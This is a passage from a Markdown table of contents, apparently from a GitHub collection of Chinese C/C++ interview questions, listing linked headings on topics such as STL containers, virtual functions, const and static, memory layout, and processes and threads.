输入一个四位的十进制整数,编程实现将这四位整数转化为十六进制的字符串,并输出十六进制的字符串(注意负数的处理)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#737%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%AA%E5%9B%9B%E4%BD%8D%E7%9A%84%E5%8D%81%E8%BF%9B%E5%88%B6%E6%95%B4%E6%95%B0%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%B0%86%E8%BF%99%E5%9B%9B%E4%BD%8D%E6%95%B4%E6%95%B0%E8%BD%AC%E5%8C%96%E4%B8%BA%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%B9%B6%E8%BE%93%E5%87%BA%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%A8%E6%84%8F%E8%B4%9F%E6%95%B0%E7%9A%84%E5%A4%84%E7%90%86) ##### [18.3.4 
介绍一下STL,详细说明STL如何实现vector。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#738%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8Bstl%E8%AF%A6%E7%BB%86%E8%AF%B4%E6%98%8Estl%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0vector)
##### [18.3.5 如果用VC开发程序,常见这么几个错误,C2001,c2005,c2011,这些错误的原因是什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#739%E5%A6%82%E6%9E%9C%E7%94%A8vc%E5%BC%80%E5%8F%91%E7%A8%8B%E5%BA%8F%E5%B8%B8%E8%A7%81%E8%BF%99%E4%B9%88%E5%87%A0%E4%B8%AA%E9%94%99%E8%AF%AFc2001c2005c2011%E8%BF%99%E4%BA%9B%E9%94%99%E8%AF%AF%E7%9A%84%E5%8E%9F%E5%9B%A0%E6%98%AF%E4%BB%80%E4%B9%88)
##### [18.3.6 继承和委派有什么分别,在决定使用继承或者委派的时候需要考虑什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#740%E7%BB%A7%E6%89%BF%E5%92%8C%E5%A7%94%E6%B4%BE%E6%9C%89%E4%BB%80%E4%B9%88%E5%88%86%E5%88%AB%E5%9C%A8%E5%86%B3%E5%AE%9A%E4%BD%BF%E7%94%A8%E7%BB%A7%E6%89%BF%E6%88%96%E8%80%85%E5%A7%94%E6%B4%BE%E7%9A%84%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E8%80%83%E8%99%91%E4%BB%80%E4%B9%88)
##### [18.3.7 指针和引用有什么分别;如果传引用比传指针安全,为什么?如果我使用常量指针难道不行吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#741%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E6%9C%89%E4%BB%80%E4%B9%88%E5%88%86%E5%88%AB%E5%A6%82%E6%9E%9C%E4%BC%A0%E5%BC%95%E7%94%A8%E6%AF%94%E4%BC%A0%E6%8C%87%E9%92%88%E5%AE%89%E5%85%A8%E4%B8%BA%E4%BB%80%E4%B9%88%E5%A6%82%E6%9E%9C%E6%88%91%E4%BD%BF%E7%94%A8%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E9%9A%BE%E9%81%93%E4%B8%8D%E8%A1%8C%E5%90%97)
##### [18.3.8 参数传递有几种方式;实现多态参数传递采用什么方式,如果没有使用某种方式原因是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#742%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E6%9C%89%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E9%87%87%E7%94%A8%E4%BB%80%E4%B9%88%E6%96%B9%E5%BC%8F%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E4%BD%BF%E7%94%A8%E6%9F%90%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%8E%9F%E5%9B%A0%E6%98%AF%E4%BB%80%E4%B9%88)
##### [18.3.9 结合一个项目说明你怎样应用设计模式的理念。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#743%E7%BB%93%E5%90%88%E4%B8%80%E4%B8%AA%E9%A1%B9%E7%9B%AE%E8%AF%B4%E6%98%8E%E4%BD%A0%E6%80%8E%E6%A0%B7%E5%BA%94%E7%94%A8%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E7%9A%84%E7%90%86%E5%BF%B5)
##### [18.4.1 介绍一下你对设计模式的理解。(这个过程中有很多很细节的问题随机问的)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#744%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E4%BD%A0%E5%AF%B9%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E7%9A%84%E7%90%86%E8%A7%A3%E8%BF%99%E4%B8%AA%E8%BF%87%E7%A8%8B%E4%B8%AD%E6%9C%89%E5%BE%88%E5%A4%9A%E5%BE%88%E7%BB%86%E8%8A%82%E7%9A%84%E9%97%AE%E9%A2%98%E9%9A%8F%E6%9C%BA%E9%97%AE%E7%9A%84)
##### [18.4.2 C++和C定义结构的分别是什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#745c%E5%92%8Cc%E5%AE%9A%E4%B9%89%E7%BB%93%E6%9E%84%E7%9A%84%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88)
##### [18.4.3 构造函数可否是虚函数,为什么?析构函数呢,可否是纯虚的呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#746%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E6%98%AF%E8%99%9A%E6%B1%97%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%91%A2%E5%8F%AF%E5%90%A6%E6%98%AF%E7%BA%AF%E8%99%9A%E7%9A%84%E5%91%A2)
##### [18.4.4 
拷贝构造函数相关问题,深拷贝,浅拷贝,临时对象等。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#747%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9B%B8%E5%85%B3%E9%97%AE%E9%A2%98%E6%B7%B1%E6%8B%B7%E8%B4%9D%E6%B5%85%E6%8B%B7%E8%B4%9D%E4%B8%B4%E6%97%B6%E5%AF%B9%E8%B1%A1%E7%AD%89) ##### [18.4.5 结合1个你认为比较能体现OOP思想的项目,用UML来描述。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#748%E7%BB%93%E5%90%881%E4%B8%AA%E4%BD%A0%E8%AE%A4%E4%B8%BA%E6%AF%94%E8%BE%83%E8%83%BD%E4%BD%93%E7%8E%B0oop%E6%80%9D%E6%83%B3%E7%9A%84%E9%A1%B9%E7%9B%AE%E7%94%A8uml%E6%9D%A5%E6%8F%8F%E8%BF%B0) ##### [18.4.6 基类的有1个虚函数,子类还需要申明为virtual吗?为什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#749%E5%9F%BA%E7%B1%BB%E7%9A%84%E6%9C%891%E4%B8%AA%E8%99%9A%E5%87%BD%E6%95%B0%E5%AD%90%E7%B1%BB%E8%BF%98%E9%9C%80%E8%A6%81%E7%94%B3%E6%98%8E%E4%B8%BAvirtual%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [18.4.7 C也可以通过精心封装某些函数功能实现重用,那C++的类有什么优点吗,难道仅仅是为实现重用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#750c%E4%B9%9F%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E7%B2%BE%E5%BF%83%E5%B0%81%E8%A3%85%E6%9F%90%E4%BA%9B%E5%87%BD%E6%95%B0%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8%E9%82%A3c%E7%9A%84%E7%B1%BB%E6%9C%89%E4%BB%80%E4%B9%88%E4%BC%98%E7%82%B9%E5%90%97%E9%9A%BE%E9%81%93%E4%BB%85%E4%BB%85%E6%98%AF%E4%B8%BA%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8) ##### [18.4.8 C++特点是什么,如何实现多态?画出基类和子类在内存中的相互关系。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#751c%E7%89%B9%E7%82%B9%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E7%94%BB%E5%87%BA%E5%9F%BA%E7%B1%BB%E5%92%8C%E5%AD%90%E7%B1%BB%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E7%9B%B8%E4%BA%92%E5%85%B3%E7%B3%BB) ##### [18.4.9 为什么要引入抽象基类和纯虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#752%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%BC%95%E5%85%A5%E6%8A%BD%E8%B1%A1%E5%9F%BA%E7%B1%BB%E5%92%8C%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.5.1 介绍一下模板和容器。如何实现?(也许会让你当场举例实现)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#753%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E6%A8%A1%E6%9D%BF%E5%92%8C%E5%AE%B9%E5%99%A8%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B9%9F%E8%AE%B8%E4%BC%9A%E8%AE%A9%E4%BD%A0%E5%BD%93%E5%9C%BA%E4%B8%BE%E4%BE%8B%E5%AE%9E%E7%8E%B0) ##### [18.5.2 你如何理解MVC。简单举例来说明其应用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#754%E4%BD%A0%E5%A6%82%E4%BD%95%E7%90%86%E8%A7%A3mvc%E7%AE%80%E5%8D%95%E4%B8%BE%E4%BE%8B%E6%9D%A5%E8%AF%B4%E6%98%8E%E5%85%B6%E5%BA%94%E7%94%A8) ##### [18.5.3 什么是并行计算?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#756%E4%BB%80%E4%B9%88%E6%98%AF%E5%B9%B6%E8%A1%8C%E8%AE%A1%E7%AE%97) ##### [18.5.4 与10.110.12.29mask 255.255.255.224属于同一网段的主机IP地址有哪些?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#757%E4%B8%8E101101229mask-255255255224%E5%B1%9E%E4%BA%8E%E5%90%8C%E4%B8%80%E7%BD%91%E6%AE%B5%E7%9A%84%E4%B8%BB%E6%9C%BAip%E5%9C%B0%E5%9D%80%E6%9C%89%E5%93%AA%E4%BA%9B) ##### [18.5.5 讲一讲Makefile的内容.](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#758%E8%AE%B2%E4%B8%80%E8%AE%B2makefile%E7%9A%84%E5%86%85%E5%AE%B9) ##### [18.5.6 讲一讲C++的内联函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#759%E8%AE%B2%E4%B8%80%E8%AE%B2c%E7%9A%84%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0) ##### [18.5.7 vector, deque, 
list, set, map底层数据结构 vector(向量)——STL中标准而安全的数组。只能在vector 的“前面”增加数据。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#760vector-deque-list-set-map%E5%BA%95%E5%B1%82%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84-vector%E5%90%91%E9%87%8Fstl%E4%B8%AD%E6%A0%87%E5%87%86%E8%80%8C%E5%AE%89%E5%85%A8%E7%9A%84%E6%95%B0%E7%BB%84%E5%8F%AA%E8%83%BD%E5%9C%A8vector-%E7%9A%84%E5%89%8D%E9%9D%A2%E5%A2%9E%E5%8A%A0%E6%95%B0%E6%8D%AE) ##### [18.5.8 宏定义的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#761%E5%AE%8F%E5%AE%9A%E4%B9%89%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [18.5.9 bfs和dfs如何遍历](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#762bfs%E5%92%8Cdfs%E5%A6%82%E4%BD%95%E9%81%8D%E5%8E%86) ##### [18.6.1 CPU如果访问内存?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#763cpu%E5%A6%82%E6%9E%9C%E8%AE%BF%E9%97%AE%E5%86%85%E5%AD%98) ##### [18.6.2 找出在A数组中,B数组中没有的数字,在B数组中,A数组中没有的数字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#764%E6%89%BE%E5%87%BA%E5%9C%A8a%E6%95%B0%E7%BB%84%E4%B8%ADb%E6%95%B0%E7%BB%84%E4%B8%AD%E6%B2%A1%E6%9C%89%E7%9A%84%E6%95%B0%E5%AD%97%E5%9C%A8b%E6%95%B0%E7%BB%84%E4%B8%ADa%E6%95%B0%E7%BB%84%E4%B8%AD%E6%B2%A1%E6%9C%89%E7%9A%84%E6%95%B0%E5%AD%97) ##### [18.6.3 在C++ 程序中调用被C 编译器编译后的函数,为什么要加extern “C”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#765%E5%9C%A8c-%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc-%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0extern-c) ##### [18.6.4 头文件中的ifndef/define/endif有什么作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#766%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84ifndefdefineendif%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [18.6.5 #include<file.h> 与 #include "file.h"的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#767includefileh-%E4%B8%8E-include-fileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.6.6 评价一下C/C++各自的特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#768%E8%AF%84%E4%BB%B7%E4%B8%80%E4%B8%8Bcc%E5%90%84%E8%87%AA%E7%9A%84%E7%89%B9%E7%82%B9) ##### [18.6.7 const 有什么用途?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#769const-%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94) ##### [18.6.8 const和#define有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#770const%E5%92%8Cdefine%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [18.6.9 关于sizeof小结的。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#771%E5%85%B3%E4%BA%8Esizeof%E5%B0%8F%E7%BB%93%E7%9A%84) ##### [18.7.1 sizeof与strlen的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#772sizeof%E4%B8%8Estrlen%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.2 指针和引用的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#773%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.3 数组和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#774%E6%95%B0%E7%BB%84%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.4 
空指针和悬垂指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#775%E7%A9%BA%E6%8C%87%E9%92%88%E5%92%8C%E6%82%AC%E5%9E%82%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.5 C++中有malloc/free,为什么还有new/delete?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#776c%E4%B8%AD%E6%9C%89mallocfree%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E6%9C%89newdelete) ##### [18.7.6 什么是智能指针?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#777%E4%BB%80%E4%B9%88%E6%98%AF%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88) ##### [18.7.7 面向对象技术的基本概念是什么,三个基本特征是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#778%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E6%8A%80%E6%9C%AF%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%E6%98%AF%E4%BB%80%E4%B9%88%E4%B8%89%E4%B8%AA%E5%9F%BA%E6%9C%AC%E7%89%B9%E5%BE%81%E6%98%AF%E4%BB%80%E4%B9%88) ##### [18.7.8 C++空类默认有哪些成员函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#779c%E7%A9%BA%E7%B1%BB%E9%BB%98%E8%AE%A4%E6%9C%89%E5%93%AA%E4%BA%9B%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0) ##### [18.7.9 哪一种成员变量可以在一个类的实例之间共享?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#780%E5%93%AA%E4%B8%80%E7%A7%8D%E6%88%90%E5%91%98%E5%8F%98%E9%87%8F%E5%8F%AF%E4%BB%A5%E5%9C%A8%E4%B8%80%E4%B8%AA%E7%B1%BB%E7%9A%84%E5%AE%9E%E4%BE%8B%E4%B9%8B%E9%97%B4%E5%85%B1%E4%BA%AB) ##### [18.8.1 继承层次中,为什么基类析构函数是虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#781%E7%BB%A7%E6%89%BF%E5%B1%82%E6%AC%A1%E4%B8%AD%E4%B8%BA%E4%BB%80%E4%B9%88%E5%9F%BA%E7%B1%BB%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.8.2 为什么构造函数不能为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#782%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.8.3 如果虚函数是有效的,那为什么不把所有函数设为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#783%E5%A6%82%E6%9E%9C%E8%99%9A%E5%87%BD%E6%95%B0%E6%98%AF%E6%9C%89%E6%95%88%E7%9A%84%E9%82%A3%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E6%8A%8A%E6%89%80%E6%9C%89%E5%87%BD%E6%95%B0%E8%AE%BE%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.8.4 什么是多态?多态有什么作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#784%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%9A%E6%80%81%E5%A4%9A%E6%80%81%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [18.8.5 重载和覆盖有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#785%E9%87%8D%E8%BD%BD%E5%92%8C%E8%A6%86%E7%9B%96%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [18.8.6 公有继承、受保护继承、私有继承](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#786%E5%85%AC%E6%9C%89%E7%BB%A7%E6%89%BF%E5%8F%97%E4%BF%9D%E6%8A%A4%E7%BB%A7%E6%89%BF%E7%A7%81%E6%9C%89%E7%BB%A7%E6%89%BF) ##### [18.8.7 有哪几种情况只能用构造函数初始化列表而不能用赋值初始化?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#787%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5%E5%8F%AA%E8%83%BD%E7%94%A8%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%88%9D%E5%A7%8B%E5%8C%96%E5%88%97%E8%A1%A8%E8%80%8C%E4%B8%8D%E8%83%BD%E7%94%A8%E8%B5%8B%E5%80%BC%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [18.8.8 什么是虚指针?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#788%E4%BB%80%E4%B9%88%E6%98%AF%E8%99%9A%E6%8C%87%E9%92%88) ##### [18.8.9 
C++如何阻止一个类被实例化?一般在什么时候将构造函数声明为private?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#789c%E5%A6%82%E4%BD%95%E9%98%BB%E6%AD%A2%E4%B8%80%E4%B8%AA%E7%B1%BB%E8%A2%AB%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%B8%80%E8%88%AC%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%B0%86%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%A3%B0%E6%98%8E%E4%B8%BAprivate) ##### [18.9.1 main函数执行之前会执行什么?执行之后还能执行代码吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#790main%E5%87%BD%E6%95%B0%E6%89%A7%E8%A1%8C%E4%B9%8B%E5%89%8D%E4%BC%9A%E6%89%A7%E8%A1%8C%E4%BB%80%E4%B9%88%E6%89%A7%E8%A1%8C%E4%B9%8B%E5%90%8E%E8%BF%98%E8%83%BD%E6%89%A7%E8%A1%8C%E4%BB%A3%E7%A0%81%E5%90%97) ##### [18.9.2 请描述进程和线程的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#791%E8%AF%B7%E6%8F%8F%E8%BF%B0%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.9.3 进程间如何通信?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#792%E8%BF%9B%E7%A8%8B%E9%97%B4%E5%A6%82%E4%BD%95%E9%80%9A%E4%BF%A1) ##### [18.9.4 在网络编程中涉及并发服务器,使用多进程与多线程的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#793%E5%9C%A8%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B%E4%B8%AD%E6%B6%89%E5%8F%8A%E5%B9%B6%E5%8F%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BD%BF%E7%94%A8%E5%A4%9A%E8%BF%9B%E7%A8%8B%E4%B8%8E%E5%A4%9A%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.9.5 TCP和UDP有什么区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#794tcp%E5%92%8Cudp%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [18.9.6 经常要操作的内存分为那几个类别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#796%E7%BB%8F%E5%B8%B8%E8%A6%81%E6%93%8D%E4%BD%9C%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E4%B8%BA%E9%82%A3%E5%87%A0%E4%B8%AA%E7%B1%BB%E5%88%AB) ##### [18.9.7 请讲述堆和栈的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#797%E8%AF%B7%E8%AE%B2%E8%BF%B0%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.9.8 全局变量放在数据段,内部变量static int count;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#798%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%94%BE%E5%9C%A8%E6%95%B0%E6%8D%AE%E6%AE%B5%E5%86%85%E9%83%A8%E5%8F%98%E9%87%8Fstatic-int-count) ##### [18.9.9 类使用static成员的优点,如何访问?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#801%E7%B1%BB%E4%BD%BF%E7%94%A8static%E6%88%90%E5%91%98%E7%9A%84%E4%BC%98%E7%82%B9%E5%A6%82%E4%BD%95%E8%AE%BF%E9%97%AE) ##### [19.1.1 static数据成员和static成员函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#802static%E6%95%B0%E6%8D%AE%E6%88%90%E5%91%98%E5%92%8Cstatic%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0) ##### [19.1.2 如何引用一个已经定义过的全局变量?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#804%E5%A6%82%E4%BD%95%E5%BC%95%E7%94%A8%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%AE%9A%E4%B9%89%E8%BF%87%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F) ##### [19.1.3 static关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#805static%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [19.1.4 多态类中的虚函数表是 Compile-Time,还是 Run-Time时建立的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#808%E5%A4%9A%E6%80%81%E7%B1%BB%E4%B8%AD%E7%9A%84%E8%99%9A%E5%87%BD%E6%95%B0%E8%A1%A8%E6%98%AF-compile-time%E8%BF%98%E6%98%AF-run-time%E6%97%B6%E5%BB%BA%E7%AB%8B%E7%9A%84) ##### [19.1.5 一个父类写了一个 virtual 
函数,如果子类覆盖它的函数不加 virtual ,也能实现多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#809%E4%B8%80%E4%B8%AA%E7%88%B6%E7%B1%BB%E5%86%99%E4%BA%86%E4%B8%80%E4%B8%AA-virtual-%E5%87%BD%E6%95%B0%E5%A6%82%E6%9E%9C%E5%AD%90%E7%B1%BB%E8%A6%86%E7%9B%96%E5%AE%83%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%8D%E5%8A%A0-virtual-%E4%B9%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81) ##### [19.1.6 完成字符串拷贝可以使用 sprintf、strcpy 及 memcpy 函数,请问这些函数有什么区别,你喜欢使用哪个,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#810%E5%AE%8C%E6%88%90%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%8B%B7%E8%B4%9D%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8-sprintfstrcpy-%E5%8F%8A-memcpy-%E5%87%BD%E6%95%B0%E8%AF%B7%E9%97%AE%E8%BF%99%E4%BA%9B%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E4%BD%A0%E5%96%9C%E6%AC%A2%E4%BD%BF%E7%94%A8%E5%93%AA%E4%B8%AA%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [19.1.7 应用程序在运行时的内存包括代码区和数据区,其中数据区又包括哪些部分?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#811%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%9C%A8%E8%BF%90%E8%A1%8C%E6%97%B6%E7%9A%84%E5%86%85%E5%AD%98%E5%8C%85%E6%8B%AC%E4%BB%A3%E7%A0%81%E5%8C%BA%E5%92%8C%E6%95%B0%E6%8D%AE%E5%8C%BA%E5%85%B6%E4%B8%AD%E6%95%B0%E6%8D%AE%E5%8C%BA%E5%8F%88%E5%8C%85%E6%8B%AC%E5%93%AA%E4%BA%9B%E9%83%A8%E5%88%86) ##### [19.1.8 C++函数中值的传递方式有哪几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#812c%E5%87%BD%E6%95%B0%E4%B8%AD%E5%80%BC%E7%9A%84%E4%BC%A0%E9%80%92%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D) ##### [19.1.9 C++里面是不是所有的动作都是main()引起的?如果不是,请举例.](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#813c%E9%87%8C%E9%9D%A2%E6%98%AF%E4%B8%8D%E6%98%AF%E6%89%80%E6%9C%89%E7%9A%84%E5%8A%A8%E4%BD%9C%E9%83%BD%E6%98%AFmain%E5%BC%95%E8%B5%B7%E7%9A%84%E5%A6%82%E6%9E%9C%E4%B8%8D%E6%98%AF%E8%AF%B7%E4%B8%BE%E4%BE%8B) ##### [19.2.1 下列哪两个是等同的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#814%E4%B8%8B%E5%88%97%E5%93%AA%E4%B8%A4%E4%B8%AA%E6%98%AF%E7%AD%89%E5%90%8C%E7%9A%84) ##### [19.2.2 内联函数在编译时是否做参数类型检查?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#815%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0%E5%9C%A8%E7%BC%96%E8%AF%91%E6%97%B6%E6%98%AF%E5%90%A6%E5%81%9A%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%9F%A5) ##### [19.2.3 